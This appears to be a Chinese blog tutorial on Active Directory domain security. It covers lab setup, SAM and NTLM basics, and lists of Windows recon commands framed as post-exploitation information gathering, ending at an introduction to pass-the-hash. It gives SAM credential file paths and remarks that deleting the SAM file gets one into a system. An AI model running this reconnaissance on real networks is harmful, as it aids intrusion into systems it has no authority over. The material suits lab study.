
<!DOCTYPE html>
<html lang="zh-CN">

<head>
    <meta charset="UTF-8" />
    <title>域安全基础 | 雲流のLowest World</title>
    <meta name="author" content="C1oudfL0w0" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0" />
    <link rel="icon" href="/blog/images/croppedImage_cropped.jpg" />
    <!-- cdn挂掉的时候要可以引用本地 -->
<!-- <script src="https://cdn.staticfile.org/vue/3.2.45/vue.global.prod.min.js"></script> -->
<script src="/blog/js/vue.global.prod.min.js"></script>


<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.2.1/css/all.min.css" />


<link rel="stylesheet" href="/blog/css/all.min.css" />
<link rel="stylesheet" href="/blog/css/fonts.min.css" />
<link rel="stylesheet" href="/blog/css/search.css" />
<script> const mixins = {}; </script>

<!-- 引入jQuery-->
<!-- <script type="text/javascript" src="https://apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script> -->
<script src="/blog/js/jquery.min.js"></script>

<!--改成了prismjs高亮-->

<script src="/blog/js/lib/prism.js"></script>
<link rel="stylesheet" href="/blog/css/prism.css" rel="stylesheet" />



<script src="/blog/js/lib/preview.js"></script>










<script src="/blog/js/lib/home.js"></script>

<link rel="stylesheet" href="/blog/css/main.css" />
<!-- 引入不蒜子-->

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<script type="text/javascript" src="/blog/libs/codeBlock/codeBlockFuction.js"></script>
<!-- 代码语言 -->
<script type="text/javascript" src="/blog/libs/codeBlock/codeLang.js"></script>
<!-- 代码块复制 -->
<!-- 引入clipboard -->

<script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.8/clipboard.min.js"></script>

<script type="text/javascript" src="/blog/libs/codeBlock/codeCopy.js"></script>
<!-- 代码块收缩 -->
<script type="text/javascript" src="/blog/libs/codeBlock/codeShrink.js"></script> 
<!-- 代码块折行 -->
<style type="text/css">code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }</style>
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/blog/atom.xml" title="雲流のLowest World" type="application/atom+xml">
</head>

<body>
    <!--flag{never_g0nna g1ve_you up}-->

    <!-- 页面点击特效 -->
    <script type="text/javascript" src="/blog/js/love-click.js"></script>

    <!-- 浏览器标题 -->
    <script async type="text/javascript" src="/blog/js/FunnyTitle.js"></script>

    <!-- 动态背景 -->
    

    <!--文章目录-->
    
    <div id="toc" class="toc-article">
    <h3><i class="fas fa-stream"></i>  目录</h3>
      <div class="toc-title"></div>
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5"><span class="toc-number">2.</span> <span class="toc-text">基本概念</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">3.</span> <span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#DC-%E9%85%8D%E7%BD%AE%EF%BC%88Windows-Server-2012%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">DC 配置（Windows Server 2012）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-%E9%85%8D%E7%BD%AE%EF%BC%88Windows-Server-2008%EF%BC%89"><span class="toc-number">3.2.</span> <span class="toc-text">Web 配置（Windows Server 2008）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Windows-%E5%9F%BA%E7%A1%80"><span class="toc-number">4.</span> <span class="toc-text">Windows 基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#SCM"><span class="toc-number">4.1.</span> <span class="toc-text">SCM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SAM"><span class="toc-number">4.2.</span> <span class="toc-text">SAM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NTLM"><span class="toc-number">4.3.</span> <span class="toc-text">NTLM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E7%9B%B8%E5%85%B3%E5%91%BD%E4%BB%A4"><span class="toc-number">4.4.</span> <span class="toc-text">域相关命令</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%8E%E6%B8%97%E9%80%8F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.</span> <span class="toc-text">后渗透信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.1.</span> <span class="toc-text">本机信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">5.2.</span> <span class="toc-text">域信息收集</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">6.</span> <span class="toc-text">横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92%EF%BC%88Pass-The-Hash%EF%BC%89"><span class="toc-number">6.1.</span> <span class="toc-text">哈希传递（Pass The Hash）</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-number">7.</span> <span class="toc-text">权限维持</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%90%8E%E9%97%A8"><span class="toc-number">7.1.</span> <span class="toc-text">系统后门</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="toc-number">7.1.1.</span> <span class="toc-text">计划任务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%90%AF%E5%8A%A8%E7%9B%B8%E5%85%B3%E7%9A%84%E5%90%AF%E5%8A%A8%E9%A1%B9-x2F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E9%94%AE"><span class="toc-number">7.1.2.</span> <span class="toc-text">自启动相关的启动项&#x2F;注册表键</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%B3%BB%E7%BB%9F%E5%90%AF%E5%8A%A8%E6%96%87%E4%BB%B6%E5%A4%B9"><span class="toc-number">7.1.2.1.</span> <span class="toc-text">系统启动文件夹</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%90%E8%A1%8C%E9%94%AE"><span class="toc-number">7.1.2.2.</span> <span class="toc-text">运行键</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Winlogon-Helper"><span class="toc-number">7.1.2.3.</span> <span class="toc-text">Winlogon Helper</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8B%E4%BB%B6%E8%A7%A6%E5%8F%91%E6%89%A7%E8%A1%8C"><span class="toc-number">7.2.</span> <span class="toc-text">事件触发执行</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%B2%98%E6%BB%9E%E9%94%AE"><span class="toc-number">7.2.1.</span> <span class="toc-text">粘滞键</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%98%A0%E5%83%8F%E5%8A%AB%E6%8C%81%EF%BC%88IFEO-%E6%B3%A8%E5%85%A5%EF%BC%89"><span class="toc-number">7.2.2.</span> <span class="toc-text">映像劫持（IFEO 注入）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B1%8F%E4%BF%9D-amp-%E7%99%BB%E5%BD%95"><span class="toc-number">7.2.3.</span> <span class="toc-text">屏保&amp;登录</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E5%90%8E%E9%97%A8"><span class="toc-number">7.3.</span> <span class="toc-text">域后门</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SID-History"><span class="toc-number">7.3.1.</span> <span class="toc-text">SID History</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DCSync"><span class="toc-number">7.4.</span> <span class="toc-text">DCSync</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B7%A5%E5%85%B7"><span class="toc-number">8.</span> <span class="toc-text">工具</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Mimikatz"><span class="toc-number">8.1.</span> <span class="toc-text">Mimikatz</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Sekurlsa-%E6%A8%A1%E5%9D%97"><span class="toc-number">8.1.1.</span> <span class="toc-text">Sekurlsa 模块</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kiwi"><span class="toc-number">8.1.2.</span> <span class="toc-text">kiwi</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CrackMapExec"><span class="toc-number">8.2.</span> <span class="toc-text">CrackMapExec</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%93%88%E5%B8%8C%E4%BC%A0%E9%80%92%E5%AE%9E%E7%8E%B0-smb-%E8%BF%9E%E6%8E%A5"><span class="toc-number">8.2.1.</span> <span class="toc-text">哈希传递实现 smb 连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#smb-%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92"><span class="toc-number">8.2.2.</span> <span class="toc-text">smb 密码喷洒</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Impacket"><span class="toc-number">8.3.</span> <span class="toc-text">Impacket</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MacOS-%E4%B8%8B%E7%9A%84%E9%97%AE%E9%A2%98"><span class="toc-number">8.3.1.</span> <span class="toc-text">MacOS 下的问题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%9F%E8%83%BD"><span class="toc-number">8.3.2.</span> <span class="toc-text">功能</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BloodHound"><span class="toc-number">8.4.</span> <span class="toc-text">BloodHound</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rpcclient"><span class="toc-number">8.5.</span> <span class="toc-text">rpcclient</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#AdFind"><span class="toc-number">8.6.</span> <span class="toc-text">AdFind</span></a></li></ol></li></ol>
    </div>
  

    <!--返回顶部-->
    <div id="totop" style="position:fixed;bottom:50px;right:60px;font-size: 48px;cursor: pointer;z-index: 10;">
        <a title="返回顶部">↑</a>
    </div>
    <script src="/blog/js/totop.js"></script>

    <div id="layout">
        
            <div id="content-background" ref="contentBackground" data-images="https://pic.imgdb.cn/item/65d61d809f345e8d03b8bc7a.png"></div>
            
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>第一次加载文章图片可能会花费较长时间</p>
                    <p>要不挂个梯子试试？（x</p>
                    <p>加载过慢请开启缓存&ensp;浏览器默认开启</p>
                    <img src="/blog/images/loading.gif" />
                </div>
            </div>
        </transition>
        <transition name="into">
            <div id="main" v-show="!loading">
                <nav id="menu" ref="menu">
    <div class="desktop-menu">
        <a class="title" href="/blog/">
            <span>雲流のLOWEST WORLD</span>
        </a>
        
        <a href="/blog/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/blog/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/blog/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;Archives</span>
        </a>
        
        <a href="/blog/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/blog/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
        <a href="/blog/links">
            <i class="fa-solid fa-link fa-fw"></i>
            <span>&ensp;Links</span>
        </a>
        
        <a href="/blog/search">
            <i class="fa-solid fa-search fa-fw"></i>
            <span>&ensp;Search</span>
        </a>
        
    </div>
    <div id="mobile-menu">
        <div class="curtain" v-show="showMenu" @click="showMenu = !showMenu"></div>
        <div class="title" @click="showMenu = !showMenu">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;雲流のLOWEST WORLD</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="showMenu">
            
            <a href="/blog/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                </div>
            </a>
            
            <a href="/blog/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                </div>
            </a>
            
            <a href="/blog/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Archives</div>
                </div>
            </a>
            
            <a href="/blog/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                </div>
            </a>
            
            <a href="/blog/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                </div>
            </a>
            
            <a href="/blog/links">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-link fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Links</div>
                </div>
            </a>
            
            <a href="/blog/search">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-search fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">Search</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>

                <div class="article">
    <div>
        <h1>域安全基础</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2025/9/4
        </span>
        
        
        <!--文章字数统计-->
        
            
<div style="margin-top:10px;">
    <span class="post-time">
      <span class="post-meta-item-icon">
        <i class="fa fa-keyboard-o"></i>
        <span class="post-meta-item-text">  字数统计: </span>
        <!-- 安装插件npm install hexo-wordcount --save -->
        <span class="post-count">5.5k字</span>
      </span>
    </span>

    <span class="post-time">
      &nbsp; | &nbsp;
      <span class="post-meta-item-icon">
        <i class="fa fa-hourglass-half"></i>
        <span class="post-meta-item-text">  阅读时长: </span>
        <span class="post-count">22分</span>
      </span>
    </span>
    
    <!--不蒜子统计访问数-->
    <span id="busuanzi_container_page_pv">
    &nbsp; | &nbsp;
    总文章阅读量：<span id="busuanzi_value_page_pv"></span>次
    </span>
</div>

          
    </div>
    
    <div class="content" v-pre>
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>参考：</p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1624522">https://cloud.tencent.com/developer/article/1624522</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/272298.html">https://www.freebuf.com/articles/system/272298.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_28205153/article/details/113827476">https://blog.csdn.net/qq_28205153/article/details/113827476</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/360319.html">https://www.freebuf.com/sectool/360319.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-mo-/p/11890232.html">https://www.cnblogs.com/-mo-/p/11890232.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_42077227/article/details/130279040">https://blog.csdn.net/qq_42077227/article/details/130279040</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/websecyw/p/15964217.html">https://www.cnblogs.com/websecyw/p/15964217.html</a></p>
<p><a target="_blank" rel="noopener" href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8GPO%E4%B8%AD%E7%9A%84%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C">https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8GPO%E4%B8%AD%E7%9A%84%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E5%AE%9E%E7%8E%B0%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C</a></p>
<p>《内网渗透体系建设》 Nu1L Team</p>
<span id="more"></span>

<hr>
<h1 id="基本概念"><a href="#基本概念" class="headerlink" title="基本概念"></a>基本概念</h1><p>假设你是某部门的管理人员，希望能够拥有该部门的所有服务器的登陆、配置权限，那么是不是需要去所有服务器上创建管理员账户呢？一旦需要修改，就需要去每台服务器上都执行一次操作</p>
<p>如果这些服务器都在一个域里面，管理员只需要用域管理员账号修改一次，配置就会统一下发到所有服务器上，极大程度上减少了我们的工作量。</p>
<p>相关概念：</p>
<ul>
<li>**域(Domain)**：将网络中的多台计算机通过逻辑的方式组织到一起，进行集中管理，这种集中管理的环境称为域。</li>
<li>**域控制器（Domain Controller，DC)**：每个域中至少有一台域控制器、集中存放整个域的用户账号和安全数据库，安装了活动目录(AD)的主机称为域控制器。</li>
<li>**活动目录（Active Directory，AD)**：活动目录是一个目录数据库，存储整个windows网络中对象的相关信息（可以理解为存储了网络中所有资源的快捷方式）。也是一种服务，可对活动目录中数据执行各种操作。</li>
<li><strong>父域和子域</strong>：出于管理需求，需要在网络中划分多个域。第一个域称为父域，各分部的域称为子域。不同的域之间，信息交互的条目会大大减少，且可以压缩后进行交互，节约带宽。并且域管可以针对各个域，设置不同的安全策略，灵活管理。</li>
<li>**域树 (Tree)**：域管只能管理本域，如果需要管理其他域，则需要建立信任关系，域树则是指多个域通过建立信任关系组成的集合。同理，多个域树通过建立信任关系组成的集合则称为域林。</li>
<li>**域名服务器 (DNS)**：用于实现域名和与之对应的IP地址之间相互转换。因为域中的计算机是使用DNS来定位域控和其他服务器的，所以域的名字就是DNS域的名字。（DNS和DC一般在同一台机器上）</li>
</ul>
<p>和工作组的区别：</p>
<ul>
<li>工作组：默认模式，人人平等，不方便管理  </li>
<li>域：人人不平等，集中管理，统一管理</li>
</ul>
<hr>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><p>搭一个简单的单域环境： test.moe</p>
<p>此处的 VMware 网络均设置为桥接模式</p>
<h2 id="DC-配置（Windows-Server-2012）"><a href="#DC-配置（Windows-Server-2012）" class="headerlink" title="DC 配置（Windows Server 2012）"></a>DC 配置（Windows Server 2012）</h2><p>IP：192.168.45.10<br>子网掩码：255.255.255.0<br>默认网关：192.168.45.122<br>DNS：192.168.45.10</p>
<p>在服务器管理器中修改主机名为 DC，并重新启动服务器</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022718565.png"></p>
<p>接下来安装域控制器与 DNS 服务，服务器管理器-管理-添加角色和功能</p>
<p>下一步直到选择服务器角色，勾选 DNS 服务器，然后下一步直到安装，建议勾选“如果需要，自动重新启动目标服务器”</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022613859.png"></p>
<p>安装完成时会出现“将此服务器提升为域控制器”，点击，进入 Active Directory 域服务配置向导</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022653849.png"></p>
<p>部署配置-添加新林，输入域名 test.moe</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022901663.png"></p>
<p>进入域控制器选项，指定域控制器功能为“域名系统（DNS）服务器”和“全局编录（GC）”，并设置目录服务恢复模式（DSRM）的密码</p>
<blockquote>
<p>DSRM：允许管理员在域环境出现故障或崩溃时还原，修复，重建 AD。在域渗透中，DSRM 可以用于对域环境进行持久化操作</p>
</blockquote>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022854181.png"></p>
<p>默认下一步，直到安装</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022844765.png"></p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022838530.png"></p>
<p>重新启动服务器后，用域管理员账户 TEST\Administrator 登录</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022830418.png"></p>
<p>注意重启后服务器的 DNS 会被自动修改为 127.0.0.1，需要手动将其修改为本机 IP</p>
<p>最后，需要创建域用户，打开“Active Directory 用户和计算机”（可 win+r 输入 dsa.msc 直接打开）</p>
<p>选中 Users 目录右键，新建-用户，设置新用户 Alice，密码永不过期，密码设置为 c4%@aEWo</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022808904.png"></p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022752315.png"></p>
<p>然后就创建成功了</p>
<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20260118022738199.png"></p>
<hr>
<h2 id="Web-配置（Windows-Server-2008）"><a href="#Web-配置（Windows-Server-2008）" class="headerlink" title="Web 配置（Windows Server 2008）"></a>Web 配置（Windows Server 2008）</h2><p>接下来将 Windows Server 2008 主机加入域</p>
<p>IP：192.168.45.20<br>子网掩码：255.255.255.0<br>默认网关：192.168.45.122<br>DNS 地址：域控的 IP 192.168.45.10</p>
<p>修改主机名为 WIN2008-WEB，隶属于域，域名修改为 test.moe</p>
<p>确定后输入域管理员的用户名和密码，即可成功加入 test.moe 域</p>
<hr>
<h1 id="Windows-基础"><a href="#Windows-基础" class="headerlink" title="Windows 基础"></a>Windows 基础</h1><h2 id="SCM"><a href="#SCM" class="headerlink" title="SCM"></a>SCM</h2><p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/windows/win32/services/service-control-manager">https://learn.microsoft.com/zh-cn/windows/win32/services/service-control-manager</a></p>
<p>服务控制管理器（SCM）在系统启动时启动。 它是远程过程调用（RPC）服务器，以便服务配置和服务控制程序可以作远程计算机上的服务。</p>
<hr>
<h2 id="SAM"><a href="#SAM" class="headerlink" title="SAM"></a>SAM</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_56378124/article/details/118112981">https://blog.csdn.net/m0_56378124/article/details/118112981</a></p>
<p>securityaccountmanager，安全账号管理器。Windows中对用户账户的安全管理使用了 SAM 的机制，安全账号管理器对账号的管理是通过安全标识进行的，安全标识在账号创建时就同时创建，一旦账号被删除，安全标识也同时被删除。</p>
<p>类似于 unix 系统中的 passwd 文件,不过没有 unix 的 passwd 文件那么直观，当我们忘记密码的时候，就可以通过删除 SAM 文件，快速地进入系统</p>
<p>位置：</p>
<ul>
<li>C:\WINDOWS\repair\SAM</li>
<li>C:\WINDOWS\system32\config\SAM</li>
</ul>
<hr>
<h2 id="NTLM"><a href="#NTLM" class="headerlink" title="NTLM"></a>NTLM</h2><p><a target="_blank" rel="noopener" href="https://websec.readthedocs.io/zh/latest/auth/ntlm.html">https://websec.readthedocs.io/zh/latest/auth/ntlm.html</a></p>
<p>NTLM是 NT LAN Manager 的缩写，NTLM 是基于挑战&#x2F;应答的身份验证协议，是 Windows NT 早期版本中的标准安全协议。</p>
<p>流程：</p>
<ul>
<li>客户端在本地加密当前用户的密码成为密码散列</li>
<li>客户端向服务器明文发送账号</li>
<li>服务器端产生一个16位的随机数字发送给客户端，作为一个challenge</li>
<li>客户端用加密后的密码散列来加密challenge，然后返回给服务器，作为response</li>
<li>服务器端将用户名、challenge、response发送给域控制器</li>
<li>域控制器用这个用户名在SAM密码管理库中找到这个用户的密码散列，然后使用这个密码散列来加密chellenge</li>
<li>域控制器比较两次加密的challenge，如果一样那么认证成功，反之认证失败</li>
</ul>
<hr>
<h2 id="域相关命令"><a href="#域相关命令" class="headerlink" title="域相关命令"></a>域相关命令</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/05-hust/articles/12307385.html">https://www.cnblogs.com/05-hust/articles/12307385.html</a></p>
<p><a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/">https://learn.microsoft.com/zh-cn/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/</a></p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">net user <span class="token operator">/</span>domain
<span class="token comment"># 查看当前域中的用户</span>

net <span class="token function">group</span>
<span class="token comment"># 列出本地服务器上的所有组，域环境下只能用于域控</span>
net <span class="token function">group</span> <span class="token string">"domain admins"</span> <span class="token operator">/</span>domain
<span class="token comment"># 列出域内管理员组的用户</span>

net use
<span class="token comment"># 查看自身当前与网络资源的连接，例如驱动器映射、IPC连接</span>
net use e: \\financial\letters
<span class="token comment"># 将E盘分配给financial服务器上的letters共享目录</span>
net use d:\\server\share <span class="token operator">/</span>user:Accounts\User1
<span class="token comment"># 连接</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<hr>
<h1 id="后渗透信息收集"><a href="#后渗透信息收集" class="headerlink" title="后渗透信息收集"></a>后渗透信息收集</h1><h2 id="本机信息收集"><a href="#本机信息收集" class="headerlink" title="本机信息收集"></a>本机信息收集</h2><pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">whoami <span class="token operator">/</span>all

ipconfig <span class="token operator">/</span>all

route print

systeminfo

netstat <span class="token operator">-</span>ano

net session

net share

net use

tasklist

wmic service get Caption<span class="token punctuation">,</span> Name<span class="token punctuation">,</span> PathName<span class="token punctuation">,</span> StartName<span class="token punctuation">,</span> State

schtasks <span class="token operator">/</span>query <span class="token operator">/</span>v <span class="token operator">/</span>fo list

wmic startup get Caption<span class="token punctuation">,</span> Command<span class="token punctuation">,</span> Location<span class="token punctuation">,</span> User

wmic qfe get Caption<span class="token punctuation">,</span> CSName<span class="token punctuation">,</span> Description<span class="token punctuation">,</span> HotFixID<span class="token punctuation">,</span> InstalledOn

wmic product get Caption<span class="token punctuation">,</span> Verion

net user

net localgroup

query user<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<hr>
<h2 id="域信息收集"><a href="#域信息收集" class="headerlink" title="域信息收集"></a>域信息收集</h2><pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">net config workstation

net user <span class="token operator">/</span>domain

net <span class="token function">group</span> <span class="token operator">/</span>domain

net accounts <span class="token operator">/</span>domain
<span class="token comment"># 查看域内密码策略</span>

net <span class="token function">group</span> <span class="token string">"Domain Controllers"</span> <span class="token operator">/</span>domain
<span class="token comment"># 查看域控制器列表</span>

net time <span class="token operator">/</span>domain
<span class="token comment"># 查看主域控制器</span>

ping DC<span class="token punctuation">.</span>domain<span class="token punctuation">.</span>com
<span class="token comment"># 定位域控制器</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<hr>
<h1 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h1><h2 id="哈希传递（Pass-The-Hash）"><a href="#哈希传递（Pass-The-Hash）" class="headerlink" title="哈希传递（Pass The Hash）"></a>哈希传递（Pass The Hash）</h2><p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/472019671">https://zhuanlan.zhihu.com/p/472019671</a></p>
<p>在域环境中，用户登录计算机时一般使用域账号，大量计算机在安装时会使用相同的本地管理员账号和密码，因此，如果计算机的本地管理员账号和密码也相同，攻击者就能使用哈希传递攻击的方法来登录内网中的其他主机。</p>
